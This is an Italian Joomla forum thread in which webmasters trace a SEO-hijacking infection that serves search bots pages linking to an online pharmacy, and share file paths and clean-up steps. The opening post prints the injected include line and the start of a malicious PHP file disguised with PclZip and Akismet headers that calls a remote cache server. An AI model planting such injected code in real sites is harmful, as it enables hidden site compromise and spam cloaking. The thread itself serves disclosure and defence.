Joomla.it Forum
Non solo Joomla... => Sicurezza => : Massimiliano Citterio 19 Apr 2017, 02:16:23
-
Gentili webmasters di Siti basati su joomla,
essendo recentemente stato attaccato su entrambi due siti da me amministrati con Joomla 3.6.5 ed avendo rimosso l'hacking ma non identificato la fonte, verificato tramite referenza google webmaster tools che almeno altri 500 siti hanno lo stesso problema nonostante i loro webmaster non se ne siano accorti sono a segnalarvi quanto segue con preghiera di verificare i vostri siti:
Tipo di Attacco:
SEO Hijacking
Payload:
il programma identifica il tipo di browser agent e qualora questo sia identificato come un Bot di motore di ricerca, sostituisce la pagina richiesta con una appositamente caricata in una cache remota al fine di fornire al browser una copia della pagina originale con tutti i link modificati per puntare ad un sito di vendita di Farmaci online Estero euro-pharm247.com
meccanismo di injection :
Probabile FTP tramite libreria Layer FTP Joomla innescato da un robot con riarmo periodico la cui fonte non sono riuscito ad identificare in quanto non ho i log e il provider li nega.
File Modificati:
libraries/loader.php
Codice Iniettato:
define('JPATH_ADAPTERSERVER', dirname(__FILE__).'/joomla/base/adapterobserver.php');
if(file_exists(JPATH_ADAPTERSERVER))
@require_once(JPATH_ADAPTERSERVER);
File caricati
libraries/joomla/base/adapterobserver.php
Contenuto del file: oscurato dominio e codice di accesso alla cache remota
solo parte iniziale del file il file completo in allegato per referenza
<?php
// --------------------------------------------------------------------------------
// PhpConcept Library - Zip Module 2.8.2
// --------------------------------------------------------------------------------
// License GNU/LGPL - Vincent Blavet - August 2009
// http://www.phpconcept.net
// --------------------------------------------------------------------------------
//
// Presentation :
// PclZip is a PHP library that manage ZIP archives.
// So far tests show that archives generated by PclZip are readable by
// WinZip application and other tools.
//
// Description :
// See readme.txt and http://www.phpconcept.net
//
// Warning :
// This library and the associated files are non commercial, non professional
// work.
// It should not have unexpected results. However if any damage is caused by
// this software the author can not be responsible.
// The use of this software is at the risk of the user.
//
// --------------------------------------------------------------------------------
// $Id: pclzip.lib.php,v 1.60 2009/09/30 21:01:04 vblavet Exp $
// --------------------------------------------------------------------------------
/**
* @package Akismet
*/
/*
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from comment and trackback spam</strong>. It keeps your site protected from spam even while you sleep. To get started: 1) Click the "Activate" link to the left of this description, 2) Sign up for an Akismet API key, and 3) Go to your <a href="plugins.php?page=akismet-key-config">Akismet configuration[/url] page, and save your API key.
Version: 2.5.3
Author: Automattic
Author URI: http://automattic.com/wordpress-plugins/
License: GPLv2 or later
*/
/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
*/
error_reporting(0);
ignore_user_abort(true);
//@header('X-Powered-By:');
set_time_limit(0);
define('__STATISTIC_URL__', 'http://botvsbrowser.com/rch_pdf/show.php');
define('__DOMAIN_NAME__', 'domain.ltd);
define('__SEC_VALUE__', 'axxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx3');
//'#$GET_CONTENT_FUNCTIONS$#'
....
-
Ciao Massimiliano Citterio,
erano presenti estensioni esterne installate in questi due siti che hanno bucato ?
-
Entrambi i siti erano stati migrati dalla 1.5 qualche anno fa utilizzando il plugin Red Migrator.
Altre estensioni erano presenti solo su uno dei due siti
di seguito linko l'unico riscontro nei motori di ricerca di un caso analogo con maggiori informazioni
https://wordpress.org/support/topic/polylang-spam-link-from-search-engine/ (https://wordpress.org/support/topic/polylang-spam-link-from-search-engine/)
-
verifica se anche le estensioni erano sempre state mantenute aggiornate.
-
dalla 3.0 in poi sempre mantenuto aggiornato in automatico con verifica il core, la traduzione e tutte le estensioni.
Nota:
Nel 2013 ero cliente di Websolutions per il mantenimento dei domini,
la società è stata violata in quell'anno ed il database degli utenti con passwords, domini e dati delle carte di credito è stato rubato.
A causa di questo ho dovuto rifare anche la carta di credito.
Devo verificare se è possibile che già in quel periodo non fosse stato inserita una backdoor di qualche tipo per concedere al bot la possibilità di scrivere.
Comunque a scanso di equivoci ho "Smerigliato lo spazio hosting"
Cambiato Provider , Reinstallato Una versione Vergine della 3.6.5 , esportato gli articoli e gli utenti , e ricaricato esclusivamente questi riconfigurato il template grafico, cambiato tutte le password.
Ora dal backup del sito precedente caricato in locale cercherò di capire qualcosa di più.
Vi tengo aggiornati se trovo qualcosa, sonno permettendo.
-
Grazie per la segnalazione Massimiliano,
spero vivamente che riuscirai a risolvere per il meglio.
L' unico url sospetto che hai postato, forse l'unico trovato, http://botvsbrowser.com/rch_pdf/show.php risponde con una pagina completamente vuota, se esaminato con un browser privo della capacità di leggere il javascript. Meglio non chiamarlo con un browser a impostazioni normali, eh ...
L' IP di riferimento è questo 5.61.34.138
ed è di proprietà del Sistema Autonomo: AS28753 Leaseweb Deutschland GmbH un fornitore tedesco di server.
Una cosa che si può fare e che non costa nulla è inviare una mail al loro abuse segnalando che uno dei loro ip è coinvolto in un hackeraggio. L' ip non è assegnato a nessun host ma è praticamente impossibile che un ISP faccia direttamente attività che non dovrebbe, probabilmente uno dei loro clienti si è preso un ip di riserva, senza assegnarlo.
Anche se non rispondono faranno comunque dei controlli.
Ovviamente questo ip va bannato da ieri ...
Auguri e un saluto.
-
già fatta una indagine sull url
questo è il risultato
https://productforums.google.com/forum/#!topic/webmasters/62syo3QCRo0;context-place=topicsearchin/webmasters/category$3A(malware--hacked-sites) (https://productforums.google.com/forum/#!topic/webmasters/62syo3QCRo0;context-place=topicsearchin/webmasters/category$3A(malware--hacked-sites))
il servizio in se stesso è Safe, ma può essere utilizzato per scopi malevoli da terzi.
-
Vedo. Ci sono anche i tuoi post del 14 marzo.
Ho fatto una verifica. I file incriminati non li ho da nessuna parte, fortunatamente.
Ciao!
-
Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc
Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking così chi visitava il tuo sito era soggetto a quell'attacco. Ce ne sono infiniti di siti così ma navigando con browser un minimo settati e magari protetti da no script questo difficilmente succede
-
Un attacco hijacking con le sue varianti (tabnabbing, clickjacking etc) non ha come obbiettivo joomla o altro ma i form con credenziali, meglio se di paypal piuttosto che ebay amazon etc
Hai frainteso questo non è un semplice hijacking,
ecco di cosa si tratta
https://cognitiveseo.com/blog/7255/defend-against-serp-hijacking-before-you-lose-your-rankings/ (https://cognitiveseo.com/blog/7255/defend-against-serp-hijacking-before-you-lose-your-rankings/)
L'attacco è volto a essere invisibile agli utenti umani e visibile solo ai motori di ricerca, serve ad aumentare il ranking di ricerca di uno specifico sito, in questo caso un sito di vendita di farmaci online come sopra specificato , quasi sempre localizzato in uno stato per il quale l'attività di marketing seo non è normata e quindi, se non danneggia le persone o costituisce altro reato, non è punibile.
Cosa diversa invece per l'Italia dove il fatto costituisce "accesso abusivo a sistema informatico" ed è punibile ai sensi dell'art.615ter del codice penale.
https://it.wikipedia.org/wiki/Accesso_abusivo_a_un_sistema_informatico_o_telematico (https://it.wikipedia.org/wiki/Accesso_abusivo_a_un_sistema_informatico_o_telematico)
Il problema è che grazie a questi provider di ......... che per poco più di 20 euro all'anno ti danno sì un hosting, ma in caso di accesso abusivo non ti danno gli strumenti per raccogliere le prove e dimostrare il fatto, ne tanto meno identificare l'attore responsabile che ha commesso il fatto illecito, probabilmente la faranno franca.
La mia speranza è che qualcun altro abbia subito l'attacco su un server virtuale o dedicato e che quindi sia in possesso, magari anche inconsciamente , delle tracce forensi per dimostrare l'illecito.
Voglio solo farvi capire che non ho postato questa segnalazione per chiedere aiuto o assistenza , anzi tutt'altro se qualcuno dovesse accorgersi di avere il file incriminato o si accorge di strane segnalazioni cercando il proprio sito su google , mi contatti pure che so come liberarvene. Se poi riusciamo anche a pizzicare il farabutto meglio.
Ho appena finito di ripulire la cache di google e le pagine indicizzate ed ho una lista con 539 siti con joomla o wordpress che risultano violati allo stesso modo, ma per assurdo per via della privacy non posso contattare i proprietari. Spero solo che un giorno facendo una ricerca trovino questo thread ed ottengano informazioni su caso. La cosa più brutta e trovarsi un virus o un trojan e non trovare nessuna informazione su internet; per un utente non professionista di informatica è disarmante.
Vi prego quindi d i rispondere a questo thread solo se avete rilevato l'infezione sul vostro sito o avete considerazioni rilevanti da fare sul caso, mi arriverà la notifica e cercherò di rispondervi appena possibile.
Spero che il moderatore sia d'accordo con me su questo.
Ciao a tutti.
-
Mi spieghi la differenza?
Articolo:
Hijacked SERP
In this dreaded circumstance, a hacker gains access to your website and inserts keywords and links pointing to his business
Io:
Il tuo problema (a mio umile parere) è che ti hanno bucato il sito (quando non saprei) inserendo uno script usato per hijacking
-
Grazie della utilissima segnalazione Massimiliano Citterio.
Qualche giorno fa google mi ha messo l'avviso di sito pericoloso e mi ha avvisato dell'hacheraggio.
In effetti nei risultati della ricerca da quel mio sito partivano dei redirect che finivano a quel sito di medicinali.
Scansionato il sito con antivirus in locale e su tre siti online non risutava presente malware.
Chiedevo riabilitazione a google che in pochi gironi me la concedeva.
Ma continuavo a vedere quei redirect nei risultati della ricerca. Non avrei saputo che pesci pigliare.
Quando googlando mi sono imbattuto in questo tuo meraviglioso dettagliato post.
Trovato i due file che hai segnalato. Ripulito il primo e cancellato il secondo. Redirect spariti! :) :) :)
L'accesso ftp e all'admin joomla a questo sito ce l'ho solo io.
Il sito è nato con joomla 3.2.1 ed è stato via via sempre aggiornato.
Se posso essere utile in qualche altro modo...
Grazie ancora!
-
E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?
-
E qua sorge un dubbio: vulnerabilità dell'ultima versione, exploit compiuto con versione vecchia o password ftp debole?
Tonicopi tu hai mica i log?
- Qui da me l'exploit non poteva essere fatto su una versione vecchia perchè sono partito con la 3.2.1
- ho chiesto adesso i file di log ma visto questo preso dalle loro FAQ ...e non c'è nemmeno la possibilità di avere accesso ai log di sistema.... non credo li avremo... >:(
-
Alè, beccato un altro sito, stesso provider, posso aggiungere che dei file modificati/aggiunti vedo la data via ftp: 22.2.2017
Il problema secondo me è molto serio e molto diffuso...
>:(
-
Che sistema operativo avete nei PC che utilizzate per connettervi via FTP a questi siti ?
Che programma utilizzate per connettervi via FTP a questi siti?
Toni, nei siti che hai trovato bucati, c'erano delle estensioni esterne installate ?
-
Mio sistema operativo Windows 7 ultimate.
Programma ftp filezilla 3.25.1
In entrambi i siti uso template warp7, widgetkit, Jce, cache cleaner, akeeba backup, sh404sef.
Ma sono tutte aggiornate e le stesse estensioni le uso anche in altre decine di siti che non sono stati hackerati.
Per il momento.
Questo hackeraggio è davvero subdolo: ha ingannato persino gli operatori di google i quali, esaminando le pagine incriminate da browser anzichè dalla ricerca, hanno riabilitato il sito senza che in realtà fosse stato ripulito. ;D
Sul secondo sito sono intervenuto prima che se ne accorgesse nessuno, grazie a questo post. :)
-
Diffuso sembra diffuso...forse troppo diffuso...senza i file di log però purtroppo non possiamo capire da dove ha origine, come penso interpreti Alex, l'infezione potrebbe essere partita dal pc con un keylogger o qualcosa di simile..
-
Ricordo una cosa simile molti anni fa ed il problema era un malware sui PC windows che prendeva i dati di connessione dalla configurazione di Filezilla (che li salvava in chiaro) e li inviava all'attaccante.
Ma non saprei se anche in questo caso sia questo il problema.
-
...senza i file di log però purtroppo non possiamo capire da dove ha origine....
Ecco e non me li danno i file di log. Suggeriscono:
Le consigliamo di:
- effettuare un'accurata scansione antivirus ed antitrojan del suo PC
- modificare i dati di accesso FTP (e farlo periodicamente)
- aggiornare gli scripts presenti nello spazio web (ad esempio per joomla ci sono diversi exploit noti per le versioni non aggiornati)
- controllare il codice degli scripts PHP presenti nello spazio, perché potrebbero esserci backdoor
mentre mi annuciano che stanno implementando la possibilità per il cliente di accedere ai file di log. Tra qualche mese la feature sarà disponibile.
-
Io penso che parta da un malware sul pc che ruba i dati di accesso all'ftp; in un forum di un altro cms si fa riferimento a identificazione di un ip anomalo nel file di log ftp, ma nulla in riferimento a stringhe più elaborate nei log di apache.
-
Aggiornamento:
Nel frattempo che si chiacchierava in entrambi i siti sono di nuovo stati modifcati / aggiunti i due files.
Ripuliti e cambiata per entrambi la password ftp con una molto più strong.
-
prova a non salvare nel client FTP questi nuovi dati di accesso.
Magari usa l'accesso veloce copiando incollando ogni volta i dati di accesso.
-
prova a non salvare nel client FTP questi nuovi dati di accesso.
Magari usa l'accesso veloce copiando incollando ogni volta i dati di accesso.
Ok sarà la prossima prova perchè li avevo già salvati in filezilla.
Per il momento non sono stati modificati-aggiunti ancora.
-
Guarda via ftp dei files che abbiano una data di modifica strana o uguale a quella dei files malevoli che hai trovato, secondo me hai uno script offuscato che ricrea i files.
-
Dubito che si tratti di uno sniffing dei dai di accesso ftp, sulle installazioni infettate, mai utilizzato l'accesso ftp, sempre il filemanager del provider in https. Il Pc è una Debian 8, il tablet un samsung note. Ma sicuramente l'accesso è avvenuto via ftp.
Attenzione joomla salva i dati ftp nel file configuration.php, ma andrebbero usati solo come alternativa nel caso gli aggiornamenti non si installassero.
Se in qualche maniera la piattaforma ha una vulnerabilità che permette di far leggere il contenuto del configuration.php allora potrebbe ottenere i dati di accesso ftp.
Io ho rimosso i dati e disattivato l'uso dell'ftp per gli aggornamenti, funziona tutto bene lo stesso. Ho anche impostato delle ACL sull Ftp perchè sia accessibile solo dai miei indirizzi ip statici. Per chi ha l'ip dinamico è un problema.
Ho usato per la prima volta l'ftp proprio per scaricare il sito e trovare le differenze, è cosi che ho trovato i file.
Stasera preparo uno scriptino php da aggiungere agli index.php per creare un log di accesso , uno per il frontend e uno per il backend.
Dobbiamo capire se c'è una vulnerabità nel core.
Abbiamo capito Chi e perchè
Abbiamo scoperto Cosa.
Adesso dobbiamo capire Come.
-
versione di PHP ?
Spero almeno una 5.6.25 o superiore,
o una 7.0.18.
Le vulnerabilità sono presenti anche nelle versioni obsolete dei servizi in uso sul server, PHP, mysql, apache ecc...
-
ora ho la 5.6 su entrambi. prima erano su ******.
Scusate ma ****** da la 5.6 solo con il pacchetto plus. altrimenti mette una 5.4 . è patchata ma è sempre una 5.4. Se qualcuno di ****** mi legge , vi prego date la 5.6 a tutti. E l' https anche.
-
perfetto vedo che i provider non si possono nominare. Meglio così
-
Infatti da me ci sta php 5.4.45 ;D e niente https... ;D ;D ;D
Cmq da quando ho cambiato la pasword ftp oggi pomeriggio i file non sono più cambiati.
-
il ciclo di crawnling del robot di questo malware è una volta a settimana.
quindi se oggi si era reinstallato devi aspettare fino a venerdì prossimo.
-
il ciclo di crawnling del robot di questo malware è una volta a settimana.
quindi se oggi si era reinstallato devi aspettare fino a venerdì prossimo.
No da me nei due siti sono ricomparsi ieri 22 aprile in uno alle ore 17,05 e nell'altro alle ore 17,14, stesso provider. Vediamo adesso quando tornano... ;D
-
Stessa cosa oggi 23 alle ore 18 in entrambi i siti.
-
questa http://0day.today/exploits/26794 è stata patchata? ...è di gennaio...
-
questa http://0day.today/exploits/26794 (http://0day.today/exploits/26794) è stata patchata? ...è di gennaio...
Non ho mica capito cosa vuoi dire con quel link Ahmed Salvini ... ;D
-
Che a quanto pare, e la fonte è attendibile, gira un exploit remoto critico per l'ultima versione di joomla 3.6.5.
E visto che l'exploit è ancora privato, dubito che ci sia una patch disponibile..
-
Ho visto, dopo ci ero arrivato pure io. Subito quel sito non si apriva....
Ma in quella fonte autorevole scovano le vulnerabilità e poi le vendono? Questa non la sapevo. :o
Speriamo qualcuno ci metta presto una pezza....
Io nel frattempo ho scovato un file dentro la cartella media/media/images/sun.php che allego per gli studiosi. Da quel che capisco è il file deputato a reinserire i file per i redirect ed è multisuo utilizzabile sia per joomla che per wordpress e forse persino per pagine html. Ma magari ho detto una castroneria....
-
si, diciamo che è una specie di shell o almeno ne include delle peculiarità, sicuramente non centra con Joomla.
Sembra però non essere il risultato di un automatismo ma di qualche pischelletto che ti ha preso di mira.
-
Non credo si tratti di un pischelletto. Perchè:
- a quel che ho letto ne sono affetti centinaia se non migliaia di siti;
- vengono creati questi redirect a questo sito: euro-pharm247.com visibili solo ai motori di ricerca.
Quel sito ne trae indubbio vantaggio è non è di un pischelletto.
Si tartta dunque di un lavoro professionale ed applicato su larga scala.
Non so ancora come mi entrano, se sfruttando una falla nel server e magari quella vulnerabilità di joomla che mi hai segnalato tu.
Adesso credo di aver tolto tutti quei file ed ho cambiato di nuovo le password ftp.
Vedremo che succede.
Intanto vorrei chiedere: se questo accesso informatico è un reato, possibile che non riusciamo a far pagare il conto a qualcuno? Questo sito euro-pharm247.com è il beneficiario. Ha un nome e cognome. Perchè non mobilitiamo il Vamba che su queste indagini si divertiva? :D
-
perchè è stata divulgata senza proporre patch in quanto il problema era di terze parti
https://developer.joomla.org/security-centre.html
All versions of the third-party PHPMailer library distributed with Joomla! versions up to 3.6.5 are vulnerable to a remote code execution vulnerability. This is patched in PHPMailer 5.2.20 which will be included with Joomla! 3.7.
possibile che non riusciamo a far pagare il conto a qualcuno? Questo sito euro-pharm247.com è il beneficiario. Ha un nome e cognome. --------------------------------------------------------
perchè spesso è necessaria una rogatoria. Immagina se il server o il malintenzionato operano in Turchia... ci abbiamo messo 2 settimane con la mobilitazione di ministri e ambasciatori per portare a casa un giornalista figurati per l'estradizione di uno che ti frega un po' di ranking :)
-
Sembra che il problema sia proprio quello....
http://www.securityfocus.com/bid/95108/info
Quindi in teoria anche se non attaccato dovrei essere tra le potenziali vittime >:( finchè non verrà posto rimedio al problema (sembra dalla j3.7)...
-
Beh, dal g+ di alex sembra che devi attendere fino a domani, comunque si può sempre aggiornare la libreria a manina anche se non è alla portata di tutti anche se su qualche forum sicuramente avranno proposto una soluzione.
Un sw opensource non può essere trascurato nemmeno 1gg, soprattutto se usato professionalmente, ne bucano uno e li bucano tutti :) oppure hai un sito blog personale con un backup aggiornato allora puoi permetterti ciò che vuoi e che decidi
-
L'unica cosa che non capisco è il perchè alcuni siti si altri no... Il mio è tra i candidati avendo una versione di phpmailer inferiore al 5.2.18...
Se fosse un attacco con robot dovebbero averlo scovato... A meno che il problema non sia causato dal contemporaneo utilizzo di una versione php inferiore a 5.6
O come hai ipotizzato tu un attacco manuale....
-
Sempre che l'exploit sia riferito al phpmailer...Mi sembrava di aver letto che anche se il phpmailer datato aveva il bug, comunque la versione 3.6.5 di joomla non avrebbe permesso all'exploit di funzionare. Per questo non era stata rilasciata alcuna patch per joomla 3.6.5.
After analysis, the JSST has determined that through correct use of the JMail class, there are additional validations in place which make executing this vulnerability impractical within the Joomla environment. As well, the vulnerability requires being able to pass user input to a message's "from" address; all places in the core Joomla API which send mail use the sender address set in the global configuration and does not allow for user input to be set elsewhere. However, extensions which bundle a separate version of PHPMailer or do not use the Joomla API to send email may be vulnerable to this issue.
Vero che l'exploit funzionerebbe con estensioni esterne, ma la descrizione parla di bug al core...
Edit 2:
...anche se forse non è proprio così, perchè leggo anche, a proposito dell'exploit:
The researcher also developed an Unauthenticated RCE exploit for a popular open-source application (deployed on the Internet on more than a million servers) as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
-
L'unica cosa che non capisco è il perchè alcuni siti si altri no... Il mio è tra i candidati avendo una versione di phpmailer inferiore al 5.2.18...
Questo è assolutamente normale. Avere una vulnerabilità mica vuol dire che si viene automaticamnte hackerati....
Tornando alla mia situazione, in entrambi i siti ho tolto i files malevoli e sostituito quello con l'aggiunta di codice e per il momento stanno resistendo.
-
Stai tranquillo che qualcuno avrà già trovato qualcosa anche per la 3.7 :)
-
Ho anche io questo problema, ho già aggiornato prima alla 3.7 poi alla 3.7.1 ma continuano a modificare il file loader.php mentre non caricano più il file adapterobserver.php
Ho però ancora la versione 5.4 di php
Qualcuno ha trovato qualche soluzione?
-
Qualcuno ha trovato qualche soluzione?
Se vai indietro nel topic trovi un file che avevo allegato. Devi cercare nel tuo sito file che hanno quel tipo di codice. Trovati ed elimintai quelli dovrebbe terminare l'incursione. :)
-
Ho scaricato tutti i file del sito sul mio pc, ho cercato (dal box ricerca in alto a destra di windows) "adapterobserver" ma non trovo nessun file che contiene questa parolina.. Tuttavia anche stamattina hanno modificato il file loader.php
Sbaglio qualcosa? :-\
-
Cerca appunto la stringa loader.php
Ciao
-
niente, non trovo nulla :-[
-
dall'aggiornamento a joomla 3.7.2 non mi hanno più modificato il file loader.php
si saranno arresi o con joomla 3.7.2 è stato risolto questo bug? :D
-
Buon pomeriggio,
continuo ad avere questo problema.
Il sito è aggiornato alla versione 3.8.6
php aggiornato alla 7.0
attivato https
cambiato password FTP
il giorno dopo è stato ricreato il file adapterobserver.php :(
-
Potrei aver trovato il problema, ho il mio joomla su un server condiviso in cui ho più siti Web, incluso wordpress. Bene, ho trovato nel database di uno di loro, di un wordpress, un trigger, che potrebbe avviare alcune stored procedure o uno script, per farlo. Controlla se in qualsiasi database hai un trigger attivo.
Un saluto.
-
Potrei aver trovato il problema, ho il mio joomla su un server condiviso in cui ho più siti Web, incluso wordpress. Bene, ho trovato nel database di uno di loro, di un wordpress, un trigger, che potrebbe avviare alcune stored procedure o uno script, per farlo. Controlla se in qualsiasi database hai un trigger attivo.
Un saluto.
Cosa devo cercare di preciso nel database?
Attualmente ho tamponato creando un file vuoto adapterobserver.php con permessi 000 e il loader.php impostando i permessi a 444.Se non faccio così nel giro di poche ore vedo il loader.php modificato e sito pagina bianca.
-
Riprendo questo topic perchè a distanza di diversi mesi sono riuscito a trovare l'altro file che puntualmente andava a modificare il loader.php e creava il file adapterobserver.php
Magari può essere utile a qualcuno.
Il file incriminato ha il seguente percorso: /layouts/joomla/tinymce/mags.php
Adesso l'ho eliminato, vediamo se ricompare.